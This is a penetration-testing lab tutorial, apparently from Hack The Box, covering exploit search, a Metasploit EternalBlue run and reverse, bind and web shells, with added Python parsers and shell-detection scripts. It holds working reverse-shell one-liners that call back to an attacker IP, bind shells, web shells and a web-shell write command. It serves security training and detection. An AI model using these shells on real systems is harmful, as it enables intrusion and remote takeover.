recon exploits

Public Exploits


Once we identify the services running on the ports found by our Nmap scan, the first step is to check whether any of the applications/services have public exploits. Public exploits exist for web applications as well as for other applications running on open ports, like SSH or FTP.


Finding Public Exploits

Many tools can help us search for public exploits for the various applications and services we may encounter during the enumeration phase. One way is to Google for the application name with exploit to see if we get any results:

web search

A well-known tool for this purpose is searchsploit, which we can use to search for public vulnerabilities/exploits for any application. We can install it with the following command:

vosill@htb[/htb]$ sudo apt install exploitdb -y

Then, we can use searchsploit to search for a specific application by its name, as follows:

vosill@htb[/htb]$ searchsploit openssh 7.2

----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                               |  Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                     | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                               | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service                                                                                              | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection                                                                      | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration                                                                                         | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                         | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                     | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                         | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration                                                                                        | linux/remote/40113.txt
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------

We can also utilize online exploit databases to search for vulnerabilities, like Exploit DB, Rapid7 DB, or Vulnerability Lab. The Intro to Web Applications module discusses public vulnerabilities for web applications.
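As an added example (not part of the original page, and not a searchsploit feature), the following Python script parses the searchsploit table above and, for each hit, checks whether the version expression in its title (forms like 2.3 < 7.7, < 7.4, or 7.2p1) covers a given installed version. The range-matching rule is a heuristic of this example, and the sample table is embedded so the script runs offline; a defender can run the same check against an asset inventory to see which public exploits advertise coverage of a deployed version.

```python
import re
from dataclasses import dataclass

# Constructed sample: the searchsploit table from the section above (column padding
# trimmed), embedded so the script runs offline. Normally you would pipe in
# `searchsploit <name>` output instead.
SAMPLE = """\
--------------------------------------------------------------------- -------------------------
 Exploit Title                                                        |  Path
--------------------------------------------------------------------- -------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                              | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                        | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service                                       | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection               | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration                                  | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading              | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                  | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration                                 | linux/remote/40113.txt
--------------------------------------------------------------------- -------------------------
"""


@dataclass
class Hit:
    title: str
    path: str
    platform: str   # linux, windows, multiple, ...
    kind: str       # remote, local, dos, webapps
    edb_id: int     # Exploit-DB ID, taken from the file name


VER = r"\d+(?:\.\d+)*(?:p\d+)?"
# Title head forms: "OpenSSH 2.3 < 7.7", "OpenSSH < 7.4", "OpenSSH 7.2p1"
HEAD_RE = re.compile(rf"^(?P<product>\S+)\s+(?:(?P<lo>{VER})\s+)?(?:(?P<lt><)\s+)?(?P<hi>{VER})\b")
PATH_RE = re.compile(r"^([^/]+)/([^/]+)/(\d+)\.\w+$")


def parse_searchsploit(text):
    """Turn the two-column searchsploit table into Hit records."""
    hits = []
    for line in text.splitlines():
        if "|" not in line or "Exploit Title" in line:
            continue  # separator rows and the header carry no hit
        title, path = (part.strip() for part in line.split("|", 1))
        m = PATH_RE.match(path)
        if not m:
            continue
        hits.append(Hit(title, path, m.group(1), m.group(2), int(m.group(3))))
    return hits


def version_tuple(v):
    # "7.2p1" -> (7, 2, 1); "7.2" -> (7, 2); tuples compare lexicographically
    return tuple(int(x) for x in re.split(r"[.p]", v))


def affected(title, target):
    """Heuristic (this example's rule): does the version expression in the title
    cover `target`? Returns None when the title carries no parseable version."""
    m = HEAD_RE.match(title.split(" - ", 1)[0])
    if not m:
        return None
    t, hi = version_tuple(target), version_tuple(m["hi"])
    if m["lt"]:  # "lo < hi" or "< hi": half-open range
        lo = version_tuple(m["lo"]) if m["lo"] else ()
        return lo <= t < hi
    # Exact version in the title: treat "7.2" and "7.2p1" as the same release line
    n = min(len(t), len(hi))
    return t[:n] == hi[:n]


def triage(text, target):
    """Pair each hit with whether its advertised version range covers `target`."""
    return [(h, affected(h.title, target)) for h in parse_searchsploit(text)]


if __name__ == "__main__":
    for hit, applies in triage(SAMPLE, "7.5"):
        print(f"{'APPLIES ' if applies else 'skip    '} {hit.kind:7} {hit.edb_id}  {hit.title}")
```

With the installed version set to 7.5, only the three entries whose ranges extend to 7.7 are reported as applicable; for 7.2 every entry applies, which is consistent with searchsploit having returned them for that query.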


Metasploit Primer

The Metasploit Framework (MSF) is an excellent tool for pentesters. It contains built-in exploits for many public vulnerabilities and provides an easy way to use these exploits against vulnerable targets. MSF has many other features, like:

  • Running reconnaissance scripts to enumerate remote hosts and compromised targets
  • Verification scripts to test the existence of a vulnerability without actually compromising the target
  • Meterpreter, which is a great tool to connect to shells and run commands on the compromised targets
  • Many post-exploitation and pivoting tools

Let us take a basic example of searching for an exploit for an application we are attacking and how to exploit it. To run Metasploit, we can use the msfconsole command:

vosill@htb[/htb]$ msfconsole

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v6.0.16-dev                          ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Once we have Metasploit running, we can search for our target application with the search exploit command. For example, we can search for the SMB vulnerability we identified previously:

msf6 > search exploit eternalblue

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
<SNIP>
EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010

Tip: Search can apply complex filters such as search cve:2009 type:exploit. See all the filters with help search

We found one exploit for this service. We can use it by copying its full name and passing it to the use command:

msf6 > use exploit/windows/smb/ms17_010_psexec

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command:

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

...SNIP...

Any option with Required set to yes must be set before the exploit will run. In this case, we only have two options to set. RHOSTS is the IP of our target (a single IP, multiple IPs, or a file containing a list of IPs). LHOST is the IP of our attack host (a single IP or the name of a network interface; in the example below, LHOST is set to the IP associated with our tun0 interface). We set both with the set command:

msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
LHOST => tun0
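The rule above (every option with Required set to yes must have a value) is easy to check mechanically. The following Python is added here as an example, not code from Metasploit or from the original page: it parses the show options table into records, lists the required options that are still empty, and mirrors what `set` does. With the table above it reports only RHOSTS, since the payload's LHOST lives in a separate, snipped section of the output. The parser relies on msfconsole separating columns with at least two spaces.

```python
import re
from dataclasses import dataclass

# Constructed sample: the `show options` table from above, embedded so the script
# runs offline (in practice, paste or pipe msfconsole output in).
OPTIONS_TEXT = """\
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as
"""

# One table row: 3-space indent, NAME, optional setting, yes|no, description.
# Columns are separated by at least two spaces; the setting may be empty.
ROW_RE = re.compile(r"^\s{3}(\S+)\s+(.*?)\s{2,}(yes|no)\s{2,}(\S.*)$")


@dataclass
class Option:
    name: str
    setting: str
    required: bool
    description: str


def parse_module_options(text):
    """Parse msfconsole's `show options` output into {name: Option}, in table order."""
    options = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # title line, header, underline, blank lines
        name, setting, required, desc = m.groups()
        options[name] = Option(name, setting.strip(), required == "yes", desc.strip())
    return options


def missing_required(options):
    """Names of options that are Required=yes but still have no Current Setting."""
    return [n for n, o in options.items() if o.required and not o.setting]


def set_option(options, name, value):
    """Mirror of `set NAME VALUE`; returns the echo line msfconsole prints."""
    if name not in options:
        raise KeyError(f"unknown option {name}")
    options[name].setting = value
    return f"{name} => {value}"


if __name__ == "__main__":
    opts = parse_module_options(OPTIONS_TEXT)
    print("required but unset:", missing_required(opts))   # ['RHOSTS']
    print(set_option(opts, "RHOSTS", "10.10.10.40"))       # RHOSTS => 10.10.10.40
    print("required but unset:", missing_required(opts))   # []
```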

Once we have both options set, we can start the exploitation. However, before we run the script, we can run a check to ensure the server is vulnerable:

msf6 exploit(windows/smb/ms17_010_psexec) > check

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.

As we can see, the server is indeed vulnerable. Note that not every exploit in the Metasploit Framework supports the check function. Finally, we can use the run or exploit command to run the exploit:

msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 10.10.10.40:445 - Built a write-what-where primitive...
[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.40:445 - Selecting PowerShell target
[*] 10.10.10.40:445 - Executing the payload...
[+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.40:49159) at 2020-12-27 01:13:28 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 39640 created.
Channel 0 created.
Windows 7 Professional 7601 Service Pack 1
(C) Copyright 1985-2009 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

As we can see, we have gained admin access to the box and used the shell command to drop into an interactive shell. These are basic examples of using Metasploit to exploit a vulnerability on a remote server. There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but are not limited to:

  • Granny/Grandpa
  • Jerry
  • Blue
  • Lame
  • Optimum
  • Legacy
  • Devel

Later on in this module, we will walk through the Nibbles box step-by-step and then show exploitation using Metasploit. Metasploit is another essential tool to add to our toolkit, but it is crucial not to rely solely on it. To be well-rounded testers, we must know how to best leverage all of the tools available to us, understand why they sometimes fail, and know when to pivot to manual techniques or other tools.

Types of Shells

Once we compromise a system and exploit a vulnerability to execute commands on the compromised hosts remotely, we usually need a method of communicating with the system so we don’t have to keep exploiting the same vulnerability to execute each command. To enumerate the system or take further control over it or within its network, we need a reliable connection that gives us direct access to the system’s shell (e.g., Bash or PowerShell) so we can thoroughly investigate the remote system for our next move.

One way to connect to a compromised system is through network protocols, like SSH for Linux or WinRM for Windows, which allow a remote login to the compromised system. However, unless we obtain a working set of login credentials, we cannot use these methods without first executing commands on the remote system to gain access to these services.

The other method of accessing a compromised host for control and remote code execution is through shells.

As previously discussed, there are three main types of shells: Reverse Shell, Bind Shell, and Web Shell. Each of these shells has a different method of communication for accepting and executing our commands.

Type of Shell   Method of Communication
Reverse Shell   Connects back to our system and gives us control through a reverse connection.
Bind Shell      Waits for us to connect to it and gives us control once we do.
Web Shell       Communicates through a web server, accepts our commands through HTTP parameters, executes them, and prints back the output.

Reverse Shell

A Reverse Shell is the most common type of shell, as it is the quickest and easiest method to obtain control over a compromised host. Once we identify a vulnerability on the remote host that allows remote code execution, we can start a netcat listener on our machine that listens on a specific port, say port 1234. With this listener in place, we can execute a reverse shell command that connects the remote system’s shell (e.g., Bash or PowerShell) to our netcat listener, which gives us a reverse connection to the remote system.

Netcat Listener

Start a netcat listener on a port of your choosing:

vosill@htb[/htb]$ nc -lvnp 1234
listening on [any] 1234 ...

Flags used

Flag      Description
-l        Listen mode, to wait for a connection to connect to us.
-v        Verbose mode, so that we know when we receive a connection.
-n        Disable DNS resolution and only connect from/to IPs, to speed up the connection.
-p 1234   Port number netcat is listening on, and the reverse connection should be sent to.

Connect Back IP

Find our system’s IP to send a reverse connection back to us:

vosill@htb[/htb]$ ip a
...SNIP...
 
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none
    inet 10.10.10.10/23 scope global tun0
...SNIP...

In this example, the IP of interest is under tun0, which is the HTB VPN network.

Note: We are connecting to the IP in tun0 because HTB boxes are accessed through the VPN and do not have internet connectivity. In a real pentest you may use eth0 or another adapter depending on network topology.

Reverse Shell Commands

Commands depend on the target OS (Linux/Windows) and what utilities are available. The Payloads All The Things cheat sheet has a comprehensive list. Below are reliable examples:

Bash (Linux):

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

PowerShell (Windows):

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Once executed via an exploit (Python script, Metasploit module, etc.), you should receive a connection in your netcat listener:

vosill@htb[/htb]$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.1] 41572
 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

A Reverse Shell is handy for quick access but can be fragile: if the connection drops or the command stops, you’ll need to re-exploit to regain access.


Bind Shell

A Bind Shell makes the target host listen on a port and bind a shell to that port. After executing a bind shell command on the target, you connect to that listening port (e.g., with netcat) to get a shell.

Bind Shell Commands

Bash:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

Python:

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();
while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

PowerShell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Netcat Connection

After starting the bind shell, connect to it:

vosill@htb[/htb]$ nc 10.10.10.1 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

A bind shell can be more persistent for reconnecting (assuming the bind process is still running), but if the process stops or the host reboots, access is lost until re-exploited.


Upgrading TTY

Netcat shells are often limited: no cursor movement, no command history. Upgrade the shell to a proper TTY for a better interactive experience. One common method is the pty/stty technique.

In the netcat shell:

vosill@htb[/htb]$ python -c 'import pty; pty.spawn("/bin/bash")'

Then background the shell with Ctrl+Z and run the following on your local terminal:

vosill@htb[/htb]$ stty raw -echo
vosill@htb[/htb]$ fg
[Enter]
www-data@remotehost$

To fix terminal size and term type, in a separate local terminal window check:

vosill@htb[/htb]$ echo $TERM
xterm-256color
 
vosill@htb[/htb]$ stty size
67 318

Then on the remote shell set:

export TERM=xterm-256color
stty rows 67 columns 318

Now the shell behaves more like a normal SSH session.
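Seen from the monitored host, the commands in the Reverse Shell, Bind Shell and Upgrading TTY sections leave distinctive process command lines. The following Python is an added detection example, not part of the original page: a set of regex signatures run over constructed process-execution events, returning the shell category each event matches. A bare `nc host port` is deliberately not matched on its own because ordinary port checks look the same; the bash FIFO relay is flagged only together with its mkfifo context, which is the edge case the benign `nc -zv` line exercises.

```python
import re

# Constructed process-execution events (one per line, the kind an EDR or auditd
# exec record provides). Events 0-5 reuse the command lines from the Reverse Shell,
# Bind Shell and Upgrading TTY sections (the Python bind shell abbreviated to one
# line); the last two are benign controls.
EVENTS = [
    "host=web01 user=www-data cmd=bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'",
    "host=web01 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f",
    "host=web01 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f",
    "host=web01 user=www-data cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "host=win01 user=svc_web cmd=powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);...\"",
    "host=web01 user=www-data cmd=python -c 'import socket as s;s1=s.socket();s1.bind((\"0.0.0.0\",1234));s1.listen(1);...'",
    "host=web01 user=deploy cmd=nc -zv 10.0.0.5 443",
    "host=web01 user=www-data cmd=ls -la /var/www/html",
]

SIGNATURES = {
    "reverse_shell": [
        # bash's /dev/tcp pseudo-device pointed at an IP and port
        re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
        # FIFO-relayed shell piped into an outbound `nc <ip> <port>`; a bare
        # `nc host port` is too noisy on its own, hence the mkfifo context
        re.compile(r"mkfifo.*\|\s*nc\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d+"),
        # PowerShell TCP client one-liners
        re.compile(r"Net\.Sockets\.TCPClient\(", re.I),
    ],
    "bind_shell": [
        # nc in listen mode: -l anywhere in the flag cluster (also catches -lvnp)
        re.compile(r"\bnc\s+-[A-Za-z]*l"),
        re.compile(r"TcpListener\]", re.I),
        # python socket bind() followed by listen() in one command line
        re.compile(r"\.bind\(.*\.listen\("),
    ],
    "tty_upgrade": [re.compile(r"pty\.spawn\(")],
}


def classify(event):
    """Return the signature categories the event's command line matches."""
    cmd = event.split("cmd=", 1)[1] if "cmd=" in event else event
    return [tag for tag, rxs in SIGNATURES.items() if any(rx.search(cmd) for rx in rxs)]


def scan(events):
    """(host, user, tags) for every event that matched at least one category."""
    flagged = []
    for e in events:
        tags = classify(e)
        if tags:
            fields = dict(kv.split("=", 1) for kv in e.split(" cmd=", 1)[0].split())
            flagged.append((fields.get("host"), fields.get("user"), tags))
    return flagged


if __name__ == "__main__":
    for host, user, tags in scan(EVENTS):
        print(f"{host} {user}: {', '.join(tags)}")
```

In a real deployment the same rules would run over the EDR or auditd stream; the www-data user on a web host spawning any of these is the combination to alert on, and the TTY-upgrade signature is useful precisely because it fires a moment after a shell has already been obtained.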


Web Shell

A Web Shell is a script (PHP, ASPX, JSP, etc.) placed in a webroot that accepts commands via HTTP parameters (GET/POST), executes them, and returns output in the HTTP response.

Writing a Web Shell

Simple one-line web shells:

PHP:

<?php system($_REQUEST["cmd"]); ?>

JSP:

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP:

<% eval request("cmd") %>

Uploading a Web Shell

Place the shell script into the webroot (e.g., via an upload vulnerability or by using an existing RCE to write the file). Common default webroot locations:

Web Server   Default Webroot
Apache       /var/www/html/
Nginx        /usr/local/nginx/html/
IIS          C:\inetpub\wwwroot\
XAMPP        C:\xampp\htdocs\

Example (write a PHP shell on a Linux Apache host):

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

Accessing the Web Shell

Visit the uploaded file in a browser:

http://SERVER_IP:PORT/shell.php?cmd=id

Or use curl:

vosill@htb[/htb]$ curl http://SERVER_IP:PORT/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Web shells often bypass firewall restrictions (since they use standard web ports 80/443) and persist through reboots, but they are less interactive compared to reverse/bind shells. Automation (scripts) can make them semi-interactive.
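From the defender's side, the same one-liners are what a webroot integrity check or an access-log review should catch. The following Python is an added example, not part of the original page: it scans a constructed in-memory webroot for scripts that pass request-controlled input straight into a code-execution sink, and separately flags access-log requests that drive a shell-style parameter on a script file. The file contents, log lines and rule set are constructed for the example; the three positive files are the PHP, JSP and ASP shells shown above.

```python
import re

# Constructed sample webroot: path -> file content. shell.php, cmd.jsp and x.asp are
# the one-liners from the section above; index.php and contact.php are benign controls.
WEBROOT = {
    "/var/www/html/index.php": "<?php echo 'Welcome to ' . htmlspecialchars($site); ?>",
    "/var/www/html/shell.php": '<?php system($_REQUEST["cmd"]); ?>',
    "/var/www/html/uploads/cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "/var/www/html/old/x.asp": '<% eval request("cmd") %>',
    "/var/www/html/contact.php": "<?php mail($to, $subject, $_POST['message']); ?>",
}

# Constructed access-log lines (Apache combined format); the first two mirror the
# curl request shown above, the others are ordinary traffic.
ACCESS_LOG = [
    '10.10.14.2 - - [27/Dec/2020:01:13:28 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 53 "-" "curl/7.74.0"',
    '10.10.14.2 - - [27/Dec/2020:01:13:40 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 10 "-" "curl/7.74.0"',
    '203.0.113.7 - - [27/Dec/2020:01:14:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 4812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Dec/2020:01:14:05 +0000] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Each rule pairs a code-execution sink with request-controlled input in the same statement.
RULES = [
    ("php_exec_from_request",
     re.compile(r"\b(system|shell_exec|exec|passthru|popen|proc_open)\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")),
    ("php_eval_from_request", re.compile(r"\beval\s*\(.*\$_(REQUEST|GET|POST|COOKIE)\b")),
    ("jsp_runtime_exec_from_request", re.compile(r"Runtime\.getRuntime\(\)\.exec\(.*request\.getParameter")),
    ("asp_eval_from_request", re.compile(r"\beval\s+request\(", re.I)),
]

SCRIPT_EXTS = {"php", "jsp", "asp", "aspx"}
SHELL_PARAMS = {"cmd", "command", "exec"}
REQ_RE = re.compile(r'"(?P<method>GET|POST) (?P<path>/[^ ?"]*)(?:\?(?P<query>[^ "]*))? HTTP/')


def scan_file(content):
    """Names of the rules a single file's content triggers."""
    return [name for name, rx in RULES if rx.search(content)]


def scan_webroot(files):
    """{path: [rule names]} for every file that triggered at least one rule."""
    findings = {}
    for path, content in files.items():
        hits = scan_file(content)
        if hits:
            findings[path] = hits
    return findings


def suspicious_requests(lines):
    """(path, query) for requests that pass a shell-style parameter to a script file."""
    out = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m or not m["query"]:
            continue
        params = {kv.split("=", 1)[0] for kv in m["query"].split("&")}
        if params & SHELL_PARAMS and m["path"].rsplit(".", 1)[-1] in SCRIPT_EXTS:
            out.append((m["path"], m["query"]))
    return out


if __name__ == "__main__":
    for path, hits in scan_webroot(WEBROOT).items():
        print(f"{path}: {', '.join(hits)}")
    for path, query in suspicious_requests(ACCESS_LOG):
        print(f"suspicious request: {path}?{query}")
```

The file scan catches the obvious one-liners; obfuscated shells need a different approach (file-integrity baselines of the webroot, or alerting on any new executable script under an upload directory), which is why the log-side check is kept as a second, independent signal.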


Cheat Sheet (Selected commands)

Basic tools

  • sudo openvpn user.ovpn — Connect to VPN
  • ifconfig / ip a — Show our IP address
  • netstat -rn — Show networks accessible via the VPN
  • ssh user@10.10.10.10 — SSH to a remote server
  • ftp 10.129.42.253 — FTP to a remote server
  • tmux — Start tmux
  • vim file — Open file with vim
  • :wq / :q! — Save & quit / quit without saving

Pentesting — Service scanning

  • nmap 10.129.42.253 — Run nmap on an IP
  • nmap -sV -sC -p- 10.129.42.253 — Run an nmap script scan on an IP
  • smbclient -N -L \\\\10.129.42.253 — List SMB shares (backslashes doubled so they survive shell escaping)

Web enumeration

  • gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt — Directory scan
  • curl -IL https://www.inlanefreight.com — Grab website banner
  • curl 10.10.10.121/robots.txt — List potential directories

Using shells

  • nc -lvnp 1234 — Start a nc listener on a local port
  • bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' — Reverse shell (remote → us)
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f — Start a bind shell
  • nc 10.10.10.1 1234 — Connect to a bind shell
  • python -c 'import pty; pty.spawn("/bin/bash")' — Upgrade shell TTY

Privilege escalation tools

  • ./linpeas.sh — Run linpeas to enumerate the remote server
  • sudo -l — List available sudo privileges

Transferring files

  • python3 -m http.server 8000 — Start a local webserver
  • wget http://10.10.14.1:8000/linpeas.sh — Download a file on the remote server from our machine
  • scp linenum.sh user@remotehost:/tmp/linenum.sh — Transfer a file (requires SSH)